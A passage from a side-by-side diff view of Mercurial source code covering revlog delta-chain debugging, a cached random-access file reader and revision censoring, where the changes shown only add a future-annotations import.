794 | 796 | 'p2': p2, |
|
795 | 797 | 'compressed_size': compsize, |
|
796 | 798 | 'uncompressed_size': uncompsize, |
|
797 | 799 | 'deltatype': deltatype, |
|
798 | 800 | 'chain': chain, |
|
799 | 801 | } |
|
800 | 802 | |
|
801 | 803 | if size_info or dist_info or sparse_info: |
|
802 | 804 | chain_size = 0 |
|
803 | 805 | for iter_rev in reversed(chain): |
|
804 | 806 | cached = self._chain_size_cache.get(iter_rev) |
|
805 | 807 | if cached is not None: |
|
806 | 808 | chain_size += cached |
|
807 | 809 | break |
|
808 | 810 | e = self._index[iter_rev] |
|
809 | 811 | chain_size += e[constants.ENTRY_DATA_COMPRESSED_LENGTH] |
|
810 | 812 | self._chain_size_cache[rev] = chain_size |
|
811 | 813 | data['chain_size'] = chain_size |
|
812 | 814 | |
|
813 | 815 | return data |
|
814 | 816 | |
|
815 | 817 | |
|
816 | 818 | def debug_delta_chain( |
|
817 | 819 | revlog, |
|
818 | 820 | revs=None, |
|
819 | 821 | size_info=True, |
|
820 | 822 | dist_info=True, |
|
821 | 823 | sparse_info=True, |
|
822 | 824 | ): |
|
823 | 825 | auditor = DeltaChainAuditor(revlog) |
|
824 | 826 | r = revlog |
|
825 | 827 | start = r.start |
|
826 | 828 | length = r.length |
|
827 | 829 | withsparseread = revlog.data_config.with_sparse_read |
|
828 | 830 | |
|
829 | 831 | header = ( |
|
830 | 832 | b' rev' |
|
831 | 833 | b' p1' |
|
832 | 834 | b' p2' |
|
833 | 835 | b' chain#' |
|
834 | 836 | b' chainlen' |
|
835 | 837 | b' prev' |
|
836 | 838 | b' delta' |
|
837 | 839 | ) |
|
838 | 840 | if size_info: |
|
839 | 841 | header += b' size' b' rawsize' b' chainsize' b' ratio' |
|
840 | 842 | if dist_info: |
|
841 | 843 | header += b' lindist' b' extradist' b' extraratio' |
|
842 | 844 | if withsparseread and sparse_info: |
|
843 | 845 | header += b' readsize' b' largestblk' b' rddensity' b' srchunks' |
|
844 | 846 | header += b'\n' |
|
845 | 847 | yield header |
|
846 | 848 | |
|
847 | 849 | if revs is None: |
|
848 | 850 | all_revs = iter(r) |
|
849 | 851 | else: |
|
850 | 852 | revlog_size = len(r) |
|
851 | 853 | all_revs = sorted(rev for rev in revs if rev < revlog_size) |
|
852 | 854 | |
|
853 | 855 | chainbases = {} |
|
854 | 856 | for rev in all_revs: |
|
855 | 857 | info = auditor.revinfo( |
|
856 | 858 | rev, |
|
857 | 859 | size_info=size_info, |
|
858 | 860 | dist_info=dist_info, |
|
859 | 861 | sparse_info=sparse_info, |
|
860 | 862 | ) |
|
861 | 863 | comp = info['compressed_size'] |
|
862 | 864 | uncomp = info['uncompressed_size'] |
|
863 | 865 | chain = info['chain'] |
|
864 | 866 | chainbase = chain[0] |
|
865 | 867 | chainid = chainbases.setdefault(chainbase, len(chainbases) + 1) |
|
866 | 868 | if dist_info: |
|
867 | 869 | basestart = start(chainbase) |
|
868 | 870 | revstart = start(rev) |
|
869 | 871 | lineardist = revstart + comp - basestart |
|
870 | 872 | extradist = lineardist - info['chain_size'] |
|
871 | 873 | try: |
|
872 | 874 | prevrev = chain[-2] |
|
873 | 875 | except IndexError: |
|
874 | 876 | prevrev = -1 |
|
875 | 877 | |
|
876 | 878 | if size_info: |
|
877 | 879 | chainsize = info['chain_size'] |
|
878 | 880 | if uncomp != 0: |
|
879 | 881 | chainratio = float(chainsize) / float(uncomp) |
|
880 | 882 | else: |
|
881 | 883 | chainratio = chainsize |
|
882 | 884 | |
|
883 | 885 | if dist_info: |
|
884 | 886 | if chainsize != 0: |
|
885 | 887 | extraratio = float(extradist) / float(chainsize) |
|
886 | 888 | else: |
|
887 | 889 | extraratio = extradist |
|
888 | 890 | |
|
889 | 891 | # label, display-format, data-key, value |
|
890 | 892 | entry = [ |
|
891 | 893 | (b'rev', b'%7d', 'rev', rev), |
|
892 | 894 | (b'p1', b'%7d', 'p1', info['p1']), |
|
893 | 895 | (b'p2', b'%7d', 'p2', info['p2']), |
|
894 | 896 | (b'chainid', b'%7d', 'chainid', chainid), |
|
895 | 897 | (b'chainlen', b'%8d', 'chainlen', len(chain)), |
|
896 | 898 | (b'prevrev', b'%8d', 'prevrev', prevrev), |
|
897 | 899 | (b'deltatype', b'%7s', 'deltatype', info['deltatype']), |
|
898 | 900 | ] |
|
899 | 901 | if size_info: |
|
900 | 902 | entry.extend( |
|
901 | 903 | [ |
|
902 | 904 | (b'compsize', b'%10d', 'compsize', comp), |
|
903 | 905 | (b'uncompsize', b'%10d', 'uncompsize', uncomp), |
|
904 | 906 | (b'chainsize', b'%10d', 'chainsize', chainsize), |
|
905 | 907 | (b'chainratio', b'%9.5f', 'chainratio', chainratio), |
|
906 | 908 | ] |
|
907 | 909 | ) |
|
908 | 910 | if dist_info: |
|
909 | 911 | entry.extend( |
|
910 | 912 | [ |
|
911 | 913 | (b'lindist', b'%9d', 'lindist', lineardist), |
|
912 | 914 | (b'extradist', b'%9d', 'extradist', extradist), |
|
913 | 915 | (b'extraratio', b'%10.5f', 'extraratio', extraratio), |
|
914 | 916 | ] |
|
915 | 917 | ) |
|
916 | 918 | if withsparseread and sparse_info: |
|
917 | 919 | chainsize = info['chain_size'] |
|
918 | 920 | readsize = 0 |
|
919 | 921 | largestblock = 0 |
|
920 | 922 | srchunks = 0 |
|
921 | 923 | |
|
922 | 924 | for revschunk in deltautil.slicechunk(r, chain): |
|
923 | 925 | srchunks += 1 |
|
924 | 926 | blkend = start(revschunk[-1]) + length(revschunk[-1]) |
|
925 | 927 | blksize = blkend - start(revschunk[0]) |
|
926 | 928 | |
|
927 | 929 | readsize += blksize |
|
928 | 930 | if largestblock < blksize: |
|
929 | 931 | largestblock = blksize |
|
930 | 932 | |
|
931 | 933 | if readsize: |
|
932 | 934 | readdensity = float(chainsize) / float(readsize) |
|
933 | 935 | else: |
|
934 | 936 | readdensity = 1 |
|
935 | 937 | entry.extend( |
|
936 | 938 | [ |
|
937 | 939 | (b'readsize', b'%10d', 'readsize', readsize), |
|
938 | 940 | (b'largestblock', b'%10d', 'largestblock', largestblock), |
|
939 | 941 | (b'readdensity', b'%9.5f', 'readdensity', readdensity), |
|
940 | 942 | (b'srchunks', b'%8d', 'srchunks', srchunks), |
|
941 | 943 | ] |
|
942 | 944 | ) |
|
943 | 945 | yield entry |
@@ -1,230 +1,232 | |||
|
1 | 1 | # Copyright Mercurial Contributors |
|
2 | 2 | # |
|
3 | 3 | # This software may be used and distributed according to the terms of the |
|
4 | 4 | # GNU General Public License version 2 or any later version. |
|
5 | 5 | |
|
6 | from __future__ import annotations | |
|
7 | ||
|
6 | 8 | import contextlib |
|
7 | 9 | |
|
8 | 10 | from ..i18n import _ |
|
9 | 11 | from .. import ( |
|
10 | 12 | error, |
|
11 | 13 | util, |
|
12 | 14 | ) |
|
13 | 15 | |
|
14 | 16 | |
|
15 | 17 | _MAX_CACHED_CHUNK_SIZE = 1048576 # 1 MiB |
|
16 | 18 | |
|
17 | 19 | PARTIAL_READ_MSG = _( |
|
18 | 20 | b'partial read of revlog %s; expected %d bytes from offset %d, got %d' |
|
19 | 21 | ) |
|
20 | 22 | |
|
21 | 23 | |
|
22 | 24 | def _is_power_of_two(n): |
|
23 | 25 | return (n & (n - 1) == 0) and n != 0 |
|
24 | 26 | |
|
25 | 27 | |
|
26 | 28 | class appender: |
|
27 | 29 | """the changelog index must be updated last on disk, so we use this class |
|
28 | 30 | to delay writes to it""" |
|
29 | 31 | |
|
30 | 32 | def __init__(self, vfs, name, mode, buf): |
|
31 | 33 | self.data = buf |
|
32 | 34 | fp = vfs(name, mode) |
|
33 | 35 | self.fp = fp |
|
34 | 36 | self.offset = fp.tell() |
|
35 | 37 | self.size = vfs.fstat(fp).st_size |
|
36 | 38 | self._end = self.size |
|
37 | 39 | |
|
38 | 40 | def end(self): |
|
39 | 41 | return self._end |
|
40 | 42 | |
|
41 | 43 | def tell(self): |
|
42 | 44 | return self.offset |
|
43 | 45 | |
|
44 | 46 | def flush(self): |
|
45 | 47 | pass |
|
46 | 48 | |
|
47 | 49 | @property |
|
48 | 50 | def closed(self): |
|
49 | 51 | return self.fp.closed |
|
50 | 52 | |
|
51 | 53 | def close(self): |
|
52 | 54 | self.fp.close() |
|
53 | 55 | |
|
54 | 56 | def seek(self, offset, whence=0): |
|
55 | 57 | '''virtual file offset spans real file and data''' |
|
56 | 58 | if whence == 0: |
|
57 | 59 | self.offset = offset |
|
58 | 60 | elif whence == 1: |
|
59 | 61 | self.offset += offset |
|
60 | 62 | elif whence == 2: |
|
61 | 63 | self.offset = self.end() + offset |
|
62 | 64 | if self.offset < self.size: |
|
63 | 65 | self.fp.seek(self.offset) |
|
64 | 66 | |
|
65 | 67 | def read(self, count=-1): |
|
66 | 68 | '''only trick here is reads that span real file and data''' |
|
67 | 69 | ret = b"" |
|
68 | 70 | if self.offset < self.size: |
|
69 | 71 | s = self.fp.read(count) |
|
70 | 72 | ret = s |
|
71 | 73 | self.offset += len(s) |
|
72 | 74 | if count > 0: |
|
73 | 75 | count -= len(s) |
|
74 | 76 | if count != 0: |
|
75 | 77 | doff = self.offset - self.size |
|
76 | 78 | self.data.insert(0, b"".join(self.data)) |
|
77 | 79 | del self.data[1:] |
|
78 | 80 | s = self.data[0][doff : doff + count] |
|
79 | 81 | self.offset += len(s) |
|
80 | 82 | ret += s |
|
81 | 83 | return ret |
|
82 | 84 | |
|
83 | 85 | def write(self, s): |
|
84 | 86 | self.data.append(bytes(s)) |
|
85 | 87 | self.offset += len(s) |
|
86 | 88 | self._end += len(s) |
|
87 | 89 | |
|
88 | 90 | def __enter__(self): |
|
89 | 91 | self.fp.__enter__() |
|
90 | 92 | return self |
|
91 | 93 | |
|
92 | 94 | def __exit__(self, *args): |
|
93 | 95 | return self.fp.__exit__(*args) |
|
94 | 96 | |
|
95 | 97 | |
|
96 | 98 | class randomaccessfile: |
|
97 | 99 | """Accessing arbitrary chuncks of data within a file, with some caching""" |
|
98 | 100 | |
|
99 | 101 | def __init__( |
|
100 | 102 | self, |
|
101 | 103 | opener, |
|
102 | 104 | filename, |
|
103 | 105 | default_cached_chunk_size, |
|
104 | 106 | initial_cache=None, |
|
105 | 107 | ): |
|
106 | 108 | # Required by bitwise manipulation below |
|
107 | 109 | assert _is_power_of_two(default_cached_chunk_size) |
|
108 | 110 | |
|
109 | 111 | self.opener = opener |
|
110 | 112 | self.filename = filename |
|
111 | 113 | self.default_cached_chunk_size = default_cached_chunk_size |
|
112 | 114 | self.writing_handle = None # This is set from revlog.py |
|
113 | 115 | self.reading_handle = None |
|
114 | 116 | self._cached_chunk = b'' |
|
115 | 117 | self._cached_chunk_position = 0 # Offset from the start of the file |
|
116 | 118 | if initial_cache: |
|
117 | 119 | self._cached_chunk_position, self._cached_chunk = initial_cache |
|
118 | 120 | |
|
119 | 121 | def clear_cache(self): |
|
120 | 122 | self._cached_chunk = b'' |
|
121 | 123 | self._cached_chunk_position = 0 |
|
122 | 124 | |
|
123 | 125 | @property |
|
124 | 126 | def is_open(self): |
|
125 | 127 | """True if any file handle is being held |
|
126 | 128 | |
|
127 | 129 | Used for assert and debug in the python code""" |
|
128 | 130 | return ( |
|
129 | 131 | self.reading_handle is not None or self.writing_handle is not None |
|
130 | 132 | ) |
|
131 | 133 | |
|
132 | 134 | def _open(self, mode=b'r'): |
|
133 | 135 | """Return a file object""" |
|
134 | 136 | return self.opener(self.filename, mode=mode) |
|
135 | 137 | |
|
136 | 138 | @contextlib.contextmanager |
|
137 | 139 | def _read_handle(self): |
|
138 | 140 | """File object suitable for reading data""" |
|
139 | 141 | # Use a file handle being actively used for writes, if available. |
|
140 | 142 | # There is some danger to doing this because reads will seek the |
|
141 | 143 | # file. However, revlog._writeentry performs a SEEK_END before all |
|
142 | 144 | # writes, so we should be safe. |
|
143 | 145 | if self.writing_handle: |
|
144 | 146 | yield self.writing_handle |
|
145 | 147 | |
|
146 | 148 | elif self.reading_handle: |
|
147 | 149 | yield self.reading_handle |
|
148 | 150 | |
|
149 | 151 | # Otherwise open a new file handle. |
|
150 | 152 | else: |
|
151 | 153 | with self._open() as fp: |
|
152 | 154 | yield fp |
|
153 | 155 | |
|
154 | 156 | @contextlib.contextmanager |
|
155 | 157 | def reading(self): |
|
156 | 158 | """Context manager that keeps the file open for reading""" |
|
157 | 159 | if ( |
|
158 | 160 | self.reading_handle is None |
|
159 | 161 | and self.writing_handle is None |
|
160 | 162 | and self.filename is not None |
|
161 | 163 | ): |
|
162 | 164 | with self._open() as fp: |
|
163 | 165 | self.reading_handle = fp |
|
164 | 166 | try: |
|
165 | 167 | yield |
|
166 | 168 | finally: |
|
167 | 169 | self.reading_handle = None |
|
168 | 170 | else: |
|
169 | 171 | yield |
|
170 | 172 | |
|
171 | 173 | def read_chunk(self, offset, length): |
|
172 | 174 | """Read a chunk of bytes from the file. |
|
173 | 175 | |
|
174 | 176 | Accepts an absolute offset, length to read. |
|
175 | 177 | |
|
176 | 178 | Returns a str or buffer of raw byte data. |
|
177 | 179 | |
|
178 | 180 | Raises if the requested number of bytes could not be read. |
|
179 | 181 | """ |
|
180 | 182 | end = offset + length |
|
181 | 183 | cache_start = self._cached_chunk_position |
|
182 | 184 | cache_end = cache_start + len(self._cached_chunk) |
|
183 | 185 | # Is the requested chunk within the cache? |
|
184 | 186 | if cache_start <= offset and end <= cache_end: |
|
185 | 187 | if cache_start == offset and end == cache_end: |
|
186 | 188 | return self._cached_chunk # avoid a copy |
|
187 | 189 | relative_start = offset - cache_start |
|
188 | 190 | return util.buffer(self._cached_chunk, relative_start, length) |
|
189 | 191 | |
|
190 | 192 | return self._read_and_update_cache(offset, length) |
|
191 | 193 | |
|
192 | 194 | def _read_and_update_cache(self, offset, length): |
|
193 | 195 | # Cache data both forward and backward around the requested |
|
194 | 196 | # data, in a fixed size window. This helps speed up operations |
|
195 | 197 | # involving reading the revlog backwards. |
|
196 | 198 | real_offset = offset & ~(self.default_cached_chunk_size - 1) |
|
197 | 199 | real_length = ( |
|
198 | 200 | (offset + length + self.default_cached_chunk_size) |
|
199 | 201 | & ~(self.default_cached_chunk_size - 1) |
|
200 | 202 | ) - real_offset |
|
201 | 203 | with self._read_handle() as file_obj: |
|
202 | 204 | file_obj.seek(real_offset) |
|
203 | 205 | data = file_obj.read(real_length) |
|
204 | 206 | |
|
205 | 207 | self._add_cached_chunk(real_offset, data) |
|
206 | 208 | |
|
207 | 209 | relative_offset = offset - real_offset |
|
208 | 210 | got = len(data) - relative_offset |
|
209 | 211 | if got < length: |
|
210 | 212 | message = PARTIAL_READ_MSG % (self.filename, length, offset, got) |
|
211 | 213 | raise error.RevlogError(message) |
|
212 | 214 | |
|
213 | 215 | if offset != real_offset or real_length != length: |
|
214 | 216 | return util.buffer(data, relative_offset, length) |
|
215 | 217 | return data |
|
216 | 218 | |
|
217 | 219 | def _add_cached_chunk(self, offset, data): |
|
218 | 220 | """Add to or replace the cached data chunk. |
|
219 | 221 | |
|
220 | 222 | Accepts an absolute offset and the data that is at that location. |
|
221 | 223 | """ |
|
222 | 224 | if ( |
|
223 | 225 | self._cached_chunk_position + len(self._cached_chunk) == offset |
|
224 | 226 | and len(self._cached_chunk) + len(data) < _MAX_CACHED_CHUNK_SIZE |
|
225 | 227 | ): |
|
226 | 228 | # add to existing cache |
|
227 | 229 | self._cached_chunk += data |
|
228 | 230 | else: |
|
229 | 231 | self._cached_chunk = data |
|
230 | 232 | self._cached_chunk_position = offset |
@@ -1,883 +1,885 | |||
|
1 | 1 | # censor code related to censoring revision |
|
2 | 2 | # coding: utf8 |
|
3 | 3 | # |
|
4 | 4 | # Copyright 2021 Pierre-Yves David <pierre-yves.david@octobus.net> |
|
5 | 5 | # Copyright 2015 Google, Inc <martinvonz@google.com> |
|
6 | 6 | # |
|
7 | 7 | # This software may be used and distributed according to the terms of the |
|
8 | 8 | # GNU General Public License version 2 or any later version. |
|
9 | 9 | |
|
10 | from __future__ import annotations | |
|
11 | ||
|
10 | 12 | import binascii |
|
11 | 13 | import contextlib |
|
12 | 14 | import os |
|
13 | 15 | import struct |
|
14 | 16 | |
|
15 | 17 | from ..node import ( |
|
16 | 18 | nullrev, |
|
17 | 19 | ) |
|
18 | 20 | from .constants import ( |
|
19 | 21 | COMP_MODE_PLAIN, |
|
20 | 22 | ENTRY_DATA_COMPRESSED_LENGTH, |
|
21 | 23 | ENTRY_DATA_COMPRESSION_MODE, |
|
22 | 24 | ENTRY_DATA_OFFSET, |
|
23 | 25 | ENTRY_DATA_UNCOMPRESSED_LENGTH, |
|
24 | 26 | ENTRY_DELTA_BASE, |
|
25 | 27 | ENTRY_LINK_REV, |
|
26 | 28 | ENTRY_NODE_ID, |
|
27 | 29 | ENTRY_PARENT_1, |
|
28 | 30 | ENTRY_PARENT_2, |
|
29 | 31 | ENTRY_SIDEDATA_COMPRESSED_LENGTH, |
|
30 | 32 | ENTRY_SIDEDATA_COMPRESSION_MODE, |
|
31 | 33 | ENTRY_SIDEDATA_OFFSET, |
|
32 | 34 | REVIDX_ISCENSORED, |
|
33 | 35 | REVLOGV0, |
|
34 | 36 | REVLOGV1, |
|
35 | 37 | ) |
|
36 | 38 | from ..i18n import _ |
|
37 | 39 | |
|
38 | 40 | from .. import ( |
|
39 | 41 | error, |
|
40 | 42 | mdiff, |
|
41 | 43 | pycompat, |
|
42 | 44 | revlogutils, |
|
43 | 45 | util, |
|
44 | 46 | ) |
|
45 | 47 | from ..utils import ( |
|
46 | 48 | storageutil, |
|
47 | 49 | ) |
|
48 | 50 | from . import ( |
|
49 | 51 | constants, |
|
50 | 52 | deltas, |
|
51 | 53 | ) |
|
52 | 54 | |
|
53 | 55 | |
|
54 | 56 | def v1_censor(rl, tr, censor_nodes, tombstone=b''): |
|
55 | 57 | """censors a revision in a "version 1" revlog""" |
|
56 | 58 | assert rl._format_version == constants.REVLOGV1, rl._format_version |
|
57 | 59 | |
|
58 | 60 | # avoid cycle |
|
59 | 61 | from .. import revlog |
|
60 | 62 | |
|
61 | 63 | censor_revs = set(rl.rev(node) for node in censor_nodes) |
|
62 | 64 | tombstone = storageutil.packmeta({b'censored': tombstone}, b'') |
|
63 | 65 | |
|
64 | 66 | # Rewriting the revlog in place is hard. Our strategy for censoring is |
|
65 | 67 | # to create a new revlog, copy all revisions to it, then replace the |
|
66 | 68 | # revlogs on transaction close. |
|
67 | 69 | # |
|
68 | 70 | # This is a bit dangerous. We could easily have a mismatch of state. |
|
69 | 71 | newrl = revlog.revlog( |
|
70 | 72 | rl.opener, |
|
71 | 73 | target=rl.target, |
|
72 | 74 | radix=rl.radix, |
|
73 | 75 | postfix=b'tmpcensored', |
|
74 | 76 | censorable=True, |
|
75 | 77 | data_config=rl.data_config, |
|
76 | 78 | delta_config=rl.delta_config, |
|
77 | 79 | feature_config=rl.feature_config, |
|
78 | 80 | may_inline=rl._inline, |
|
79 | 81 | ) |
|
80 | 82 | # inline splitting will prepare some transaction work that will get |
|
81 | 83 | # confused by the final file move. So if there is a risk of not being |
|
82 | 84 | # inline at the end, we prevent the new revlog to be inline in the first |
|
83 | 85 | # place. |
|
84 | 86 | assert not (newrl._inline and not rl._inline) |
|
85 | 87 | |
|
86 | 88 | for rev in rl.revs(): |
|
87 | 89 | node = rl.node(rev) |
|
88 | 90 | p1, p2 = rl.parents(node) |
|
89 | 91 | |
|
90 | 92 | if rev in censor_revs: |
|
91 | 93 | newrl.addrawrevision( |
|
92 | 94 | tombstone, |
|
93 | 95 | tr, |
|
94 | 96 | rl.linkrev(rev), |
|
95 | 97 | p1, |
|
96 | 98 | p2, |
|
97 | 99 | node, |
|
98 | 100 | constants.REVIDX_ISCENSORED, |
|
99 | 101 | ) |
|
100 | 102 | |
|
101 | 103 | if newrl.deltaparent(rev) != nullrev: |
|
102 | 104 | m = _(b'censored revision stored as delta; cannot censor') |
|
103 | 105 | h = _( |
|
104 | 106 | b'censoring of revlogs is not fully implemented;' |
|
105 | 107 | b' please report this bug' |
|
106 | 108 | ) |
|
107 | 109 | raise error.Abort(m, hint=h) |
|
108 | 110 | continue |
|
109 | 111 | |
|
110 | 112 | if rl.iscensored(rev): |
|
111 | 113 | if rl.deltaparent(rev) != nullrev: |
|
112 | 114 | m = _( |
|
113 | 115 | b'cannot censor due to censored ' |
|
114 | 116 | b'revision having delta stored' |
|
115 | 117 | ) |
|
116 | 118 | raise error.Abort(m) |
|
117 | 119 | rawtext = rl._inner._chunk(rev) |
|
118 | 120 | else: |
|
119 | 121 | rawtext = rl.rawdata(rev) |
|
120 | 122 | |
|
121 | 123 | newrl.addrawrevision( |
|
122 | 124 | rawtext, tr, rl.linkrev(rev), p1, p2, node, rl.flags(rev) |
|
123 | 125 | ) |
|
124 | 126 | |
|
125 | 127 | tr.addbackup(rl._indexfile, location=b'store') |
|
126 | 128 | if not rl._inline: |
|
127 | 129 | tr.addbackup(rl._datafile, location=b'store') |
|
128 | 130 | |
|
129 | 131 | rl.opener.rename(newrl._indexfile, rl._indexfile) |
|
130 | 132 | if newrl._inline: |
|
131 | 133 | assert rl._inline |
|
132 | 134 | else: |
|
133 | 135 | assert not rl._inline |
|
134 | 136 | rl.opener.rename(newrl._datafile, rl._datafile) |
|
135 | 137 | |
|
136 | 138 | rl.clearcaches() |
|
137 | 139 | chunk_cache = rl._loadindex() |
|
138 | 140 | rl._load_inner(chunk_cache) |
|
139 | 141 | |
|
140 | 142 | |
|
141 | 143 | def v2_censor(revlog, tr, censor_nodes, tombstone=b''): |
|
142 | 144 | """censors a revision in a "version 2" revlog""" |
|
143 | 145 | assert revlog._format_version != REVLOGV0, revlog._format_version |
|
144 | 146 | assert revlog._format_version != REVLOGV1, revlog._format_version |
|
145 | 147 | |
|
146 | 148 | censor_revs = {revlog.rev(node) for node in censor_nodes} |
|
147 | 149 | _rewrite_v2(revlog, tr, censor_revs, tombstone) |
|
148 | 150 | |
|
149 | 151 | |
|
150 | 152 | def _rewrite_v2(revlog, tr, censor_revs, tombstone=b''): |
|
151 | 153 | """rewrite a revlog to censor some of its content |
|
152 | 154 | |
|
153 | 155 | General principle |
|
154 | 156 | |
|
155 | 157 | We create new revlog files (index/data/sidedata) to copy the content of |
|
156 | 158 | the existing data without the censored data. |
|
157 | 159 | |
|
158 | 160 | We need to recompute new delta for any revision that used the censored |
|
159 | 161 | revision as delta base. As the cumulative size of the new delta may be |
|
160 | 162 | large, we store them in a temporary file until they are stored in their |
|
161 | 163 | final destination. |
|
162 | 164 | |
|
163 | 165 | All data before the censored data can be blindly copied. The rest needs |
|
164 | 166 | to be copied as we go and the associated index entry needs adjustement. |
|
165 | 167 | """ |
|
166 | 168 | assert revlog._format_version != REVLOGV0, revlog._format_version |
|
167 | 169 | assert revlog._format_version != REVLOGV1, revlog._format_version |
|
168 | 170 | |
|
169 | 171 | old_index = revlog.index |
|
170 | 172 | docket = revlog._docket |
|
171 | 173 | |
|
172 | 174 | tombstone = storageutil.packmeta({b'censored': tombstone}, b'') |
|
173 | 175 | |
|
174 | 176 | first_excl_rev = min(censor_revs) |
|
175 | 177 | |
|
176 | 178 | first_excl_entry = revlog.index[first_excl_rev] |
|
177 | 179 | index_cutoff = revlog.index.entry_size * first_excl_rev |
|
178 | 180 | data_cutoff = first_excl_entry[ENTRY_DATA_OFFSET] >> 16 |
|
179 | 181 | sidedata_cutoff = revlog.sidedata_cut_off(first_excl_rev) |
|
180 | 182 | |
|
181 | 183 | with pycompat.unnamedtempfile(mode=b"w+b") as tmp_storage: |
|
182 | 184 | # rev β (new_base, data_start, data_end, compression_mode) |
|
183 | 185 | rewritten_entries = _precompute_rewritten_delta( |
|
184 | 186 | revlog, |
|
185 | 187 | old_index, |
|
186 | 188 | censor_revs, |
|
187 | 189 | tmp_storage, |
|
188 | 190 | ) |
|
189 | 191 | |
|
190 | 192 | all_files = _setup_new_files( |
|
191 | 193 | revlog, |
|
192 | 194 | index_cutoff, |
|
193 | 195 | data_cutoff, |
|
194 | 196 | sidedata_cutoff, |
|
195 | 197 | ) |
|
196 | 198 | |
|
197 | 199 | # we dont need to open the old index file since its content already |
|
198 | 200 | # exist in a usable form in `old_index`. |
|
199 | 201 | with all_files() as open_files: |
|
200 | 202 | ( |
|
201 | 203 | old_data_file, |
|
202 | 204 | old_sidedata_file, |
|
203 | 205 | new_index_file, |
|
204 | 206 | new_data_file, |
|
205 | 207 | new_sidedata_file, |
|
206 | 208 | ) = open_files |
|
207 | 209 | |
|
208 | 210 | # writing the censored revision |
|
209 | 211 | |
|
210 | 212 | # Writing all subsequent revisions |
|
211 | 213 | for rev in range(first_excl_rev, len(old_index)): |
|
212 | 214 | if rev in censor_revs: |
|
213 | 215 | _rewrite_censor( |
|
214 | 216 | revlog, |
|
215 | 217 | old_index, |
|
216 | 218 | open_files, |
|
217 | 219 | rev, |
|
218 | 220 | tombstone, |
|
219 | 221 | ) |
|
220 | 222 | else: |
|
221 | 223 | _rewrite_simple( |
|
222 | 224 | revlog, |
|
223 | 225 | old_index, |
|
224 | 226 | open_files, |
|
225 | 227 | rev, |
|
226 | 228 | rewritten_entries, |
|
227 | 229 | tmp_storage, |
|
228 | 230 | ) |
|
229 | 231 | docket.write(transaction=None, stripping=True) |
|
230 | 232 | |
|
231 | 233 | |
|
232 | 234 | def _precompute_rewritten_delta( |
|
233 | 235 | revlog, |
|
234 | 236 | old_index, |
|
235 | 237 | excluded_revs, |
|
236 | 238 | tmp_storage, |
|
237 | 239 | ): |
|
238 | 240 | """Compute new delta for revisions whose delta is based on revision that |
|
239 | 241 | will not survive as is. |
|
240 | 242 | |
|
241 | 243 | Return a mapping: {rev β (new_base, data_start, data_end, compression_mode)} |
|
242 | 244 | """ |
|
243 | 245 | dc = deltas.deltacomputer(revlog) |
|
244 | 246 | rewritten_entries = {} |
|
245 | 247 | first_excl_rev = min(excluded_revs) |
|
246 | 248 | with revlog.reading(): |
|
247 | 249 | for rev in range(first_excl_rev, len(old_index)): |
|
248 | 250 | if rev in excluded_revs: |
|
249 | 251 | # this revision will be preserved as is, so we don't need to |
|
250 | 252 | # consider recomputing a delta. |
|
251 | 253 | continue |
|
252 | 254 | entry = old_index[rev] |
|
253 | 255 | if entry[ENTRY_DELTA_BASE] not in excluded_revs: |
|
254 | 256 | continue |
|
255 | 257 | # This is a revision that use the censored revision as the base |
|
256 | 258 | # for its delta. We need a need new deltas |
|
257 | 259 | if entry[ENTRY_DATA_UNCOMPRESSED_LENGTH] == 0: |
|
258 | 260 | # this revision is empty, we can delta against nullrev |
|
259 | 261 | rewritten_entries[rev] = (nullrev, 0, 0, COMP_MODE_PLAIN) |
|
260 | 262 | else: |
|
261 | 263 | text = revlog.rawdata(rev) |
|
262 | 264 | info = revlogutils.revisioninfo( |
|
263 | 265 | node=entry[ENTRY_NODE_ID], |
|
264 | 266 | p1=revlog.node(entry[ENTRY_PARENT_1]), |
|
265 | 267 | p2=revlog.node(entry[ENTRY_PARENT_2]), |
|
266 | 268 | btext=[text], |
|
267 | 269 | textlen=len(text), |
|
268 | 270 | cachedelta=None, |
|
269 | 271 | flags=entry[ENTRY_DATA_OFFSET] & 0xFFFF, |
|
270 | 272 | ) |
|
271 | 273 | d = dc.finddeltainfo( |
|
272 | 274 | info, excluded_bases=excluded_revs, target_rev=rev |
|
273 | 275 | ) |
|
274 | 276 | default_comp = revlog._docket.default_compression_header |
|
275 | 277 | comp_mode, d = deltas.delta_compression(default_comp, d) |
|
276 | 278 | # using `tell` is a bit lazy, but we are not here for speed |
|
277 | 279 | start = tmp_storage.tell() |
|
278 | 280 | tmp_storage.write(d.data[1]) |
|
279 | 281 | end = tmp_storage.tell() |
|
280 | 282 | rewritten_entries[rev] = (d.base, start, end, comp_mode) |
|
281 | 283 | return rewritten_entries |
|
282 | 284 | |
|
283 | 285 | |
|
284 | 286 | def _setup_new_files( |
|
285 | 287 | revlog, |
|
286 | 288 | index_cutoff, |
|
287 | 289 | data_cutoff, |
|
288 | 290 | sidedata_cutoff, |
|
289 | 291 | ): |
|
290 | 292 | """ |
|
291 | 293 | |
|
292 | 294 | return a context manager to open all the relevant files: |
|
293 | 295 | - old_data_file, |
|
294 | 296 | - old_sidedata_file, |
|
295 | 297 | - new_index_file, |
|
296 | 298 | - new_data_file, |
|
297 | 299 | - new_sidedata_file, |
|
298 | 300 | |
|
299 | 301 | The old_index_file is not here because it is accessed through the |
|
300 | 302 | `old_index` object if the caller function. |
|
301 | 303 | """ |
|
302 | 304 | docket = revlog._docket |
|
303 | 305 | old_index_filepath = revlog.opener.join(docket.index_filepath()) |
|
304 | 306 | old_data_filepath = revlog.opener.join(docket.data_filepath()) |
|
305 | 307 | old_sidedata_filepath = revlog.opener.join(docket.sidedata_filepath()) |
|
306 | 308 | |
|
307 | 309 | new_index_filepath = revlog.opener.join(docket.new_index_file()) |
|
308 | 310 | new_data_filepath = revlog.opener.join(docket.new_data_file()) |
|
309 | 311 | new_sidedata_filepath = revlog.opener.join(docket.new_sidedata_file()) |
|
310 | 312 | |
|
311 | 313 | util.copyfile(old_index_filepath, new_index_filepath, nb_bytes=index_cutoff) |
|
312 | 314 | util.copyfile(old_data_filepath, new_data_filepath, nb_bytes=data_cutoff) |
|
313 | 315 | util.copyfile( |
|
314 | 316 | old_sidedata_filepath, |
|
315 | 317 | new_sidedata_filepath, |
|
316 | 318 | nb_bytes=sidedata_cutoff, |
|
317 | 319 | ) |
|
318 | 320 | revlog.opener.register_file(docket.index_filepath()) |
|
319 | 321 | revlog.opener.register_file(docket.data_filepath()) |
|
320 | 322 | revlog.opener.register_file(docket.sidedata_filepath()) |
|
321 | 323 | |
|
322 | 324 | docket.index_end = index_cutoff |
|
323 | 325 | docket.data_end = data_cutoff |
|
